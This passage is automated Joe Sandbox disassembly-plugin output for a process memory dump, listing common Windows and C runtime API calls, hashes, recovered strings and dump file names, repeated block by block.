                                                                                                      • String ID:
                                                                                                      • API String ID: 2795783184-0
                                                                                                      • Opcode ID: 577db84d99efb4a840757e705707decca6847ca25516ec1673e29ce89420c625
                                                                                                      • Instruction ID: fff4fee15587932b34eaac3ef46ad42df65ab4d42d16a2287db661ef74adb499
                                                                                                      • Opcode Fuzzy Hash: 577db84d99efb4a840757e705707decca6847ca25516ec1673e29ce89420c625
                                                                                                      • Instruction Fuzzy Hash: FE41A1B0A18248AFDF14DBA8D891AAE7BE9AF06304F00244DF196FB291EB345D48C750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E97E1C: Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E969D3
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E965E6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E968A4
                                                                                                      • DName::operator+.LIBCMT ref: 00E9698E
                                                                                                      • DName::operator+.LIBCMT ref: 00E9699A
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E969E7
                                                                                                      • DName::operator+.LIBCMT ref: 00E969F6
                                                                                                      • DName::operator+.LIBCMT ref: 00E96A02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                                      • String ID:
                                                                                                      • API String ID: 955152517-0
                                                                                                      • Opcode ID: 4079b451a2e279c1fd1a81cc095d03d70a972a7091b676a81078aa01aa5a3e28
                                                                                                      • Instruction ID: 7fe9ca2894aafadd956a1047ca64f6a70aeb2dcdc117e476aa46dd8b78ed7d2f
                                                                                                      • Opcode Fuzzy Hash: 4079b451a2e279c1fd1a81cc095d03d70a972a7091b676a81078aa01aa5a3e28
                                                                                                      • Instruction Fuzzy Hash: D03193B1604308AFCF18DF94D9919EABBF9EF98300F00585EE586B7351DB759948CB10
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(0090FD58), ref: 00EB9FC9
                                                                                                      • SetEvent.KERNEL32(?), ref: 00EB9FE6
                                                                                                      • LeaveCriticalSection.KERNEL32(0090FD58), ref: 00EBA007
                                                                                                      • EnterCriticalSection.KERNEL32(0090FD58), ref: 00EBA02D
                                                                                                      • SetEvent.KERNEL32(?), ref: 00EBA04E
                                                                                                      • LeaveCriticalSection.KERNEL32(0090FD58), ref: 00EBA06B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3094578987-0
                                                                                                      • Opcode ID: 953c5b347f005efe7b0c064cdd335dead8fdf36a71b23e3d62d559fa706f58fe
                                                                                                      • Instruction ID: 8110b7fa8ab902923987590d955b9b7b4f75bc901dd5c9f2b206c2102a8473b2
                                                                                                      • Opcode Fuzzy Hash: 953c5b347f005efe7b0c064cdd335dead8fdf36a71b23e3d62d559fa706f58fe
                                                                                                      • Instruction Fuzzy Hash: 6E21C3308087849FEB31A739984D7F77BE06B1131CF48255DD182769A2C3B57888C792
                                                                                                      APIs
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E345DA
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E345E3
                                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 00E345F9
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,?,00000000), ref: 00E34606
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E34611
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E34625
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleWait$MultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 3743911766-0
                                                                                                      • Opcode ID: a6ee4df395ccd5bcb8a90f81dc2e83ede24bc55c00bcf94eaf16b847ebeabc29
                                                                                                      • Instruction ID: 85a7e59cf186d3114307a83daae7e4e79fd510b750b15447c816cf14d0e6a120
                                                                                                      • Opcode Fuzzy Hash: a6ee4df395ccd5bcb8a90f81dc2e83ede24bc55c00bcf94eaf16b847ebeabc29
                                                                                                      • Instruction Fuzzy Hash: 9111B431901215EFCB10AF55DC4AB6BBBB4AF49720F154259E92ABB2E0C7B1BC04CB90
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00E90E14,00E8F178,00E8E694), ref: 00E90E2B
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E90E39
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E90E52
                                                                                                      • SetLastError.KERNEL32(00000000,00E90E14,00E8F178,00E8E694), ref: 00E90EA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 93039e84ce124d8c2d28d7e8495edca7e4e9c0d249854304ba9d897eec7fc230
                                                                                                      • Instruction ID: 21c47b5b7dc5b58c6db9d30cedb2e8fdd89f225875d716b8e7b80129101f30b0
                                                                                                      • Opcode Fuzzy Hash: 93039e84ce124d8c2d28d7e8495edca7e4e9c0d249854304ba9d897eec7fc230
                                                                                                      • Instruction Fuzzy Hash: 0601B53210A3119DDF3526B5FCC55672BD4DB127B9760272EF424791F1EF515C096140
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: operator+shared_ptr
                                                                                                      • String ID: t
                                                                                                      • API String ID: 864562889-4213291413
                                                                                                      • Opcode ID: 0a43394fe19166b99d5df2002e3086fdca0871fd0375679f1500fc73cae6e9ed
                                                                                                      • Instruction ID: f705d60c6610f9c83a097e31a6ab824f3077a3bfee0c55dfdc3b0a448197ca38
                                                                                                      • Opcode Fuzzy Hash: 0a43394fe19166b99d5df2002e3086fdca0871fd0375679f1500fc73cae6e9ed
                                                                                                      • Instruction Fuzzy Hash: 6F616CB180420EEFCF25CF69DA859A97FB9FB44308F14926BE419BB211E7729645CF40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 1740715915-2505862506
                                                                                                      • Opcode ID: 730f55bf41f9db93863fbe16d863955850229f0f0654c4176d59aa67439e9030
                                                                                                      • Instruction ID: 01821971abfb48bd3432f16df34adc961e48c056c222701d85e25a5b168aa672
                                                                                                      • Opcode Fuzzy Hash: 730f55bf41f9db93863fbe16d863955850229f0f0654c4176d59aa67439e9030
                                                                                                      • Instruction Fuzzy Hash: 51511372600647EFEF289F10D981BAA77E4EF04314F2451ADE85977291EB32ED80DB90
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: H#$H#$ios_base::badbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-3082803955
                                                                                                      • Opcode ID: 296aef3cdf898f17b5fd2741472a5875cbfe73d938ce76e875ceb43e6784e913
                                                                                                      • Instruction ID: 53715abca80a7e2fc27d43a09cdc14adbd515ad18ae34f1bf60bace95535de29
                                                                                                      • Opcode Fuzzy Hash: 296aef3cdf898f17b5fd2741472a5875cbfe73d938ce76e875ceb43e6784e913
                                                                                                      • Instruction Fuzzy Hash: 1F41F2B1900209ABC704DF58C845BAEFBF8EF49310F14956EF958B7291E771A944CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EqualOffsetTypeids
                                                                                                      • String ID: 0n
                                                                                                      • API String ID: 1707706676-3368625520
                                                                                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction ID: 6a1a8564975f9b6759c84c05f557b9030afdeefd9de6cdd158b08a6f234aa35c
                                                                                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction Fuzzy Hash: 2D51AA359042099FCF14EF68C580AEEFBF0EF55318F1454AADC99B7251D332AA05CB94
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E94B60
                                                                                                        • Part of subcall function 00E92422: DName::operator+=.LIBCMT ref: 00E92438
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+Name::operator+=
                                                                                                      • String ID: =>
                                                                                                      • API String ID: 382699925-4216647267
                                                                                                      • Opcode ID: 64e284ee06100d65e7fae06df454144630eefc3247db9a62a265b658c949b418
                                                                                                      • Instruction ID: 38ea1b696381a13ef3b7b27e64dff02d413be25e0482322008ed0a2eca15ffc5
                                                                                                      • Opcode Fuzzy Hash: 64e284ee06100d65e7fae06df454144630eefc3247db9a62a265b658c949b418
                                                                                                      • Instruction Fuzzy Hash: A0410CB190120A9FDF04DFA4DA85EEEBBF4FB44314F102519E505B7280D7759A4ACB90
                                                                                                      APIs
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97447
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::getDimensionSigned
                                                                                                      • String ID: !n$`F
                                                                                                      • API String ID: 2996861206-2265164862
                                                                                                      • Opcode ID: 6291f77dc8cd01ab95ba428f714927bc198d2c2ae3214879f280fa62a415d04f
                                                                                                      • Instruction ID: 82934da2980b8d298c0f8c1726e10c4a56f6f3cf29e183a9b473b93478b6ac74
                                                                                                      • Opcode Fuzzy Hash: 6291f77dc8cd01ab95ba428f714927bc198d2c2ae3214879f280fa62a415d04f
                                                                                                      • Instruction Fuzzy Hash: 84316F7190820D9FDF14DBA4ED56BEEB7F8AB48314F10101AE551B7181DB746A09CB64
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E33020: __alldvrm.LIBCMT ref: 00E33073
                                                                                                        • Part of subcall function 00E33020: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E33094
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E40F0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                                                                                      • String ID: seconds.$(_$Calculated sum of squares for 5 seconds: $Time taken:
                                                                                                      • API String ID: 67483490-2398832356
                                                                                                      • Opcode ID: 61b7972f994a65c8c1d104e2d2da01aaf684671fd7b6d4f184f9909ed4c244b6
                                                                                                      • Instruction ID: 69f5e0443f823e63908ceee06e8dee0882ad4ed41b0fbbb1c73bbf09b6252ab2
                                                                                                      • Opcode Fuzzy Hash: 61b7972f994a65c8c1d104e2d2da01aaf684671fd7b6d4f184f9909ed4c244b6
                                                                                                      • Instruction Fuzzy Hash: 4621C3762043018FC614EE78E89692FB7E5EFC4310F146D29F551B7252DA34E909CA93
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameName::
                                                                                                      • String ID: %lf$A
                                                                                                      • API String ID: 1333004437-43661536
                                                                                                      • Opcode ID: 7440243440425997bc211d55d0681aa0d22e9d7e8fa2c06b0c99b4f0be07e51f
                                                                                                      • Instruction ID: 1be41b8d951fbaff1a093d5d03ff437222757b351a62789e3662793c5db49ab8
                                                                                                      • Opcode Fuzzy Hash: 7440243440425997bc211d55d0681aa0d22e9d7e8fa2c06b0c99b4f0be07e51f
                                                                                                      • Instruction Fuzzy Hash: 1931ACB1A04A4CDFCF15DFA4D845AEEBBB4FB09300F00505EE446BB281DBB0984ACB81
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E98463,?,?,00EED794,00000000,?,00E9858E,00000004,InitializeCriticalSectionEx,00EC9170,00EC9178,00000000), ref: 00E98432
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                      • Opcode ID: ce22bf6ded01ee24f81050317c5a879ba290eb2d9a9f06565a3ceb36c25ed229
                                                                                                      • Instruction ID: 41262667c4e83b9c7663628ec89a89b786e0d1fd5a624b409ada1d2ccd57ab8a
                                                                                                      • Opcode Fuzzy Hash: ce22bf6ded01ee24f81050317c5a879ba290eb2d9a9f06565a3ceb36c25ed229
                                                                                                      • Instruction Fuzzy Hash: 4B110631A01226AFCF228B699D44B9E7394AF13774F251221FD20FB2E0DB70ED0086D1
                                                                                                      APIs
                                                                                                      • SleepConditionVariableCS.KERNEL32(?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D703
                                                                                                      • LeaveCriticalSection.KERNEL32(00EED39C,AB1AAB9C,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D70D
                                                                                                      • WaitForSingleObjectEx.KERNEL32(AB1AAB9C,00000000,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D71E
                                                                                                      • EnterCriticalSection.KERNEL32(00EED39C,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D725
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3269011525-2505862506
                                                                                                      • Opcode ID: 5bc415cea3e5e51dfe0d28a4b1300acc3a635f5a8e4ae118d00926ec779b6e91
                                                                                                      • Instruction ID: d738a03142a73873a0a943c91f0ab1a89354ddc244bc6d5c1fee917537d4c2cf
                                                                                                      • Opcode Fuzzy Hash: 5bc415cea3e5e51dfe0d28a4b1300acc3a635f5a8e4ae118d00926ec779b6e91
                                                                                                      • Instruction Fuzzy Hash: E5E01A3664976CEFCA123B53EC09A9F7F29EB05B51F011121FA0E7A1A4C7A21D058BD6
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • _free.LIBCMT ref: 00EA23C7
                                                                                                      • _free.LIBCMT ref: 00EA23DE
                                                                                                      • _free.LIBCMT ref: 00EA23FD
                                                                                                      • _free.LIBCMT ref: 00EA2418
                                                                                                      • _free.LIBCMT ref: 00EA242F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
